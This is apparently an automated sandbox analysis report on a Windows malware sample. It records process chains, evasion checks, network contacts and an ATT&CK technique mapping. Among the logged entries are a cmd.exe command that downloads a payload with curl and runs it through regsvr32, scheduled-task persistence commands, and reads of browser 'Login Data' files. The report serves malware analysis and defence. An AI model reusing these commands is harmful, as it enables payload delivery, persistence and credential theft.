    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6376 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940 Thread sleep count: 234 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940 Thread sleep count: 163 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940 Thread sleep count: 383 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6980 Thread sleep count: 37 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6876 Thread sleep count: 31 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6940 Thread sleep count: 198 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6980 Thread sleep count: 582 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6948 Thread sleep count: 136 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6948 Thread sleep count: 1140 > 30
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformation (4 identical entries)
    Source: C:\Users\user\Desktop\1.exe File Volume queried: C:\ FullSizeInformation (7 identical entries)
    Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation (5 identical entries)
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008B63A0 FindFirstFileW,GetLastError,FindClose,0_2_008B63A0
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008E2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_008E2630
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_007754C0
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008DC670 FindFirstFileW,FindClose,0_2_008DC670
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008C5040 FindFirstFileW,FindClose,FindClose,0_2_008C5040
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008B5A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_008B5A60
    Source: C:\Users\user\Desktop\1.exe Code function: 4_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,4_2_007754C0
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_00794BB0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,0_2_00794BB0
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_0097F6C2 VirtualQuery,GetSystemInfo,0_2_0097F6C2
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
    Source: MainSoftware.exe, 00000009.00000002.2456317461.0000024A2CE3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008CCF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_008CCF30
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00982A8E mov esi, dword ptr fs:[00000030h]0_2_00982A8E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00982A8E mov esi, dword ptr fs:[00000030h]4_2_00982A8E
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00982AFA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_00982AFA
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\Surfclub\Surfclub.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00794B60 __set_se_translator,SetUnhandledExceptionFilter,0_2_00794B60
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0098357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0098357E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009882F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_009882F3
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0098357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0098357E
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007A1A50 __set_se_translator,SetUnhandledExceptionFilter,4_2_007A1A50
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00794B60 __set_se_translator,SetUnhandledExceptionFilter,4_2_00794B60
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D416FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF7D3D416FC
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 34.160.111.145 80
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, ActiveDirectorySite.cs | Reference to suspicious API methods: global::Interop.Kernel32.GetProcAddress(DirectoryContext.ADHandle, "DsListDomainsInSiteW")
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, Utils.cs | Reference to suspicious API methods: global::Interop.Advapi32.OpenProcessToken(global::Interop.Kernel32.GetCurrentProcess(), 8, out phThreadToken)
    Source: 26.2.Surfclub.exe.2b150270000.72.raw.unpack, DirectoryContext.cs | Reference to suspicious API methods: global::Interop.Kernel32.LoadLibrary(systemDirectory + "\\ntdsapi.dll")
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f
    Source: C:\Program Files\Surfclub\Install.exe | Process created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "c:\users\user\desktop\1.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="5480" chaineruiprocessid="5480chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\1.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1740568836 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\1.exe" ai_install="1"
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008B0D70 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_008B0D70
    Source: C:\Users\user\Desktop\1.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_009A60F4
    Source: C:\Users\user\Desktop\1.exe | Code function: EnumSystemLocalesW,0_2_009A63B3
    Source: C:\Users\user\Desktop\1.exe | Code function: EnumSystemLocalesW,0_2_009A63FE
    Source: C:\Users\user\Desktop\1.exe | Code function: EnumSystemLocalesW,0_2_009A6499
    Source: C:\Users\user\Desktop\1.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_009A68B5
    Source: C:\Users\user\Desktop\1.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_009A6A97
    Source: C:\Users\user\Desktop\1.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,0_2_008E4A20
    Source: C:\Users\user\Desktop\1.exe | Code function: EnumSystemLocalesW,0_2_0099D7D2
    Source: C:\Users\user\Desktop\1.exe | Code function: GetLocaleInfoW,0_2_0099DD4F
    Source: C:\Users\user\Desktop\1.exe | Code function: GetLocaleInfoW,4_2_0099DD4F
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\dialog.jpg VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\banner.jpg VolumeInformation
    Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\5nWUKDRPlH\output.zip VolumeInformation
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008FBD60 CreateNamedPipeW,CreateFileW,0_2_008FBD60
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0098419E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0098419E
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008FA6E0 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_008FA6E0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00757A00 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00757A00
    Source: C:\Users\user\Desktop\1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\1.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob

    Stealing of Sensitive Information

    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    MITRE ATT&CK Matrix (matched techniques per tactic; the number in parentheses is the match count shown in the report)

    Initial Access: Replication Through Removable Media (1)
    Execution: Native API (13); Command and Scripting Interpreter (1); Scheduled Task/Job (1)
    Persistence: DLL Side-Loading (1); Scheduled Task/Job (1)
    Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (112); Scheduled Task/Job (1)
    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (33); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (112)
    Credential Access: OS Credential Dumping (1)
    Discovery: System Time Discovery (1); Peripheral Device Discovery (11); Account Discovery (1); File and Directory Discovery (4); System Information Discovery (27); Security Software Discovery (121); Virtualization/Sandbox Evasion (31); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1); System Network Configuration Discovery (1)
    Collection: Archive Collected Data (1); Data from Local System (1); Screen Capture (1)
    Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (4)
    Reconnaissance, Resource Development, Lateral Movement, Exfiltration, Impact: no matched techniques
    Behavior Graph (ID: 1624614, Sample: 1.exe, Startdate: 26/02/2025, Architecture: WINDOWS, Score: 46; rendered as an image, not reproduced here)
    Process chain shown in the graph: 1.exe -> 1.exe and msiexec.exe; msiexec.exe -> MainSoftware.exe, msiexec.exe, SoftwareDistributor.exe; MainSoftware.exe -> schtasks.exe (x2) and Install.exe; Install.exe -> cmd.exe -> curl.exe and regsvr32.exe; SoftwareDistributor.exe -> schtasks.exe; Install.exe (Surfclub) -> Surfclub.exe
    Hosts shown in the graph: api.telegram.org (149.154.167.220, TELEGRAMRU, United Kingdom), wetransfers.io (104.21.59.228, CLOUDFLARENETUS, United States), ifconfig.me (34.160.111.145, ATGS-MMD-ASUS, United States), jonatechlab.com (104.21.6.210, CLOUDFLARENETUS, United States), swiftvantage.online (104.21.80.136, CLOUDFLARENETUS, United States), boldvertex.store (104.21.16.1, CLOUDFLARENETUS, United States), 127.0.0.1
    Signatures attached to regsvr32.exe in the graph: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal browser information (history, passwords, etc); Uses the Telegram API (likely for C&C communication) attached to api.telegram.org
